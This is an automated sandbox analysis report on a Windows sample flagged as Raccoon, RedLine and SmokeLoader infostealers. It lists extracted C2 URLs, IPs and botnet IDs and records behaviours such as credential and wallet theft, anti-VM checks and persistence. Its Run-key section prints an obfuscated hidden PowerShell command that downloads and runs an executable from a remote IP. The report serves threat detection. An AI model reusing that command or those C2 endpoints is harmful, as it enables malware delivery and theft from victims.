raccoon | c15ff185f489812fa7ae3fe20c668f9611da7a2a3e54367adf0c28bf456d0720

Analysis

max time kernel
150s
max time network
147s
platform
windows10_x64
resource
win10v20210410
submitted
12-08-2021 05:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
Size

192KB
MD5

c4ff50648c4fb9e60e0f0c30a41bba2c
SHA1

074731d50321f109427d2eb4ce0b6ee5e47e9d4a
SHA256

c15ff185f489812fa7ae3fe20c668f9611da7a2a3e54367adf0c28bf456d0720
SHA512

11b05e41a38a578004eed41bb01d5b57253b77f6985d2a0685d9dc037730976b7fedd24d8c6ebb201530479ced0cc98bbf522287fddca3b043a90d8ffd8824d5

Score

10^/10

raccoon redline smokeloader 471c70de3b4f9e4d493e418d1f60a90659057de0 @gasfer_dark cd8dc1031358b1aec55cc6bc447df1018b068607 backdoor discovery evasion infostealer persistence spyware stealer themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.52/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32

Extracted

Family

redline

Botnet

@gasfer_dark

207.154.240.76:80

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes

url4cnc
https://telete.in/p1rosto100xx

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4968	1612	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4964	1612	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1152	1612	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5048	1612	schtasks.exe

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1192-188-0x0000000000400000-0x0000000000946000-memory.dmp	family_raccoon
behavioral2/memory/2496-541-0x000000000044003F-mapping.dmp	family_raccoon
behavioral2/memory/2496-543-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\85C1.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\85C1.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\949A.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\949A.exe	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

35 2528 powershell.exe
Downloads MZ/PE file

flow	pid	process
35	2528	powershell.exe

Executes dropped EXE 64 IoCs

Processes:

7B11.exe7B11.tmp7B11.exe7B11.tmp85C1.exe8A56.exefsucenter.exe8D54.exe90B1.exeRuntimebroker.exe949A.exe8D54.exeDatabase.exeDatabase.exeinstall.exeHostData.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeinstall.exeDatabase.exeDatabase.exeDatabase.exesihost.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe

pid	process
1152	7B11.exe
3784	7B11.tmp
2112	7B11.exe
812	7B11.tmp
4036	85C1.exe
3916	8A56.exe
832	fsucenter.exe
2684	8D54.exe
1192	90B1.exe
3256	Runtimebroker.exe
2004	949A.exe
2496	8D54.exe
4448	Database.exe
4492	Database.exe
4532	install.exe
4556	HostData.exe
4588	Database.exe
4680	Database.exe
4732	Database.exe
4856	Database.exe
4940	Database.exe
4980	Database.exe
5020	Database.exe
5060	Database.exe
5100	Database.exe
2704	Database.exe
4160	Database.exe
3740	Database.exe
2516	Database.exe
4208	Database.exe
1124	Database.exe
3916	Database.exe
1992	Database.exe
916	Database.exe
824	Database.exe
184	Database.exe
1380	Database.exe
3516	Database.exe
3528	Database.exe
600	Database.exe
3196	Database.exe
4476	Database.exe
1176	Database.exe
4496	Database.exe
4564	Database.exe
4672	Database.exe
4648	Database.exe
4720	Database.exe
4792	Database.exe
4804	install.exe
4852	Database.exe
4912	Database.exe
4984	Database.exe
4052	sihost.exe
5104	Database.exe
4992	Database.exe
1192	Database.exe
2312	Database.exe
5032	Database.exe
3828	Database.exe
1328	Database.exe
4248	Database.exe
4268	Database.exe
2836	Database.exe

Checks BIOS information in registry 2 TTPs 64 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe85C1.exeDatabase.exeDatabase.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	85C1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe

Deletes itself 1 IoCs

Processes:

pid process

3064
Drops startup file 1 IoCs

Processes:

Runtimebroker.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe
Loads dropped DLL 7 IoCs

Processes:

fsucenter.exe90B1.exe8D54.exe

pid process

832 fsucenter.exe
1192 90B1.exe
1192 90B1.exe
1192 90B1.exe
1192 90B1.exe
1192 90B1.exe
2496 8D54.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3064

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk	Runtimebroker.exe

pid	process
832	fsucenter.exe
1192	90B1.exe
1192	90B1.exe
1192	90B1.exe
1192	90B1.exe
1192	90B1.exe
2496	8D54.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\85C1.exe	themida
C:\Users\Admin\AppData\Local\Temp\85C1.exe	themida
behavioral2/memory/4036-141-0x0000000000D30000-0x0000000000D31000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

install.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\ProgramData\\Mozilla\\updates\\308046B0AF4A39CB\\services.exe\""	install.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\ProgramData\\Templates\\explorer.exe\""	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files\\Google\\Chrome\\Application\\SetupMetrics\\RuntimeBroker.exe\""	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Program Files\\7-Zip\\Lang\\sihost.exe\""	install.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 56 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe85C1.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	85C1.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

Processes:

85C1.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe

pid	process
4036	85C1.exe
4448	Database.exe
4448	Database.exe
4448	Database.exe
4492	Database.exe
4492	Database.exe
4492	Database.exe
4588	Database.exe
4588	Database.exe
4588	Database.exe
4680	Database.exe
4680	Database.exe
4680	Database.exe
4732	Database.exe
4732	Database.exe
4732	Database.exe
4856	Database.exe
4856	Database.exe
4856	Database.exe
4940	Database.exe
4940	Database.exe
4940	Database.exe
4980	Database.exe
4980	Database.exe
4980	Database.exe
5020	Database.exe
5020	Database.exe
5020	Database.exe
5060	Database.exe
5060	Database.exe
5060	Database.exe
5100	Database.exe
5100	Database.exe
5100	Database.exe
2704	Database.exe
2704	Database.exe
2704	Database.exe
4160	Database.exe
4160	Database.exe
4160	Database.exe
3740	Database.exe
3740	Database.exe
3740	Database.exe
2516	Database.exe
2516	Database.exe
2516	Database.exe
4208	Database.exe
4208	Database.exe
4208	Database.exe
1124	Database.exe
1124	Database.exe
1124	Database.exe
3916	Database.exe
3916	Database.exe
3916	Database.exe
1992	Database.exe
1992	Database.exe
1992	Database.exe
916	Database.exe
916	Database.exe
916	Database.exe
824	Database.exe
824	Database.exe
824	Database.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

C4FF50648C4FB9E60E0F0C30A41BBA2C.exe8D54.exeinstall.exe

description	pid	process	target process
PID 4020 set thread context of 2388	4020	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
PID 2684 set thread context of 2496	2684	8D54.exe	8D54.exe
PID 4532 set thread context of 4804	4532	install.exe	install.exe

Drops file in Program Files directory 2 IoCs

Processes:

install.exe

description	ioc	process
File created	C:\Program Files\7-Zip\Lang\66fc9ff0ee96c2b21f0cfded48750ae9e3032bf3	install.exe
File created	C:\Program Files\7-Zip\Lang\sihost.exe	install.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4252 2496 WerFault.exe 8D54.exe

pid	pid_target	process	target process
4252	2496	WerFault.exe	8D54.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

C4FF50648C4FB9E60E0F0C30A41BBA2C.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4968 schtasks.exe
4964 schtasks.exe
1152 schtasks.exe
5048 schtasks.exe

pid	process
4968	schtasks.exe
4964	schtasks.exe
1152	schtasks.exe
5048	schtasks.exe

Modifies registry class 2 IoCs

Processes:

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

fsucenter.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	fsucenter.exe
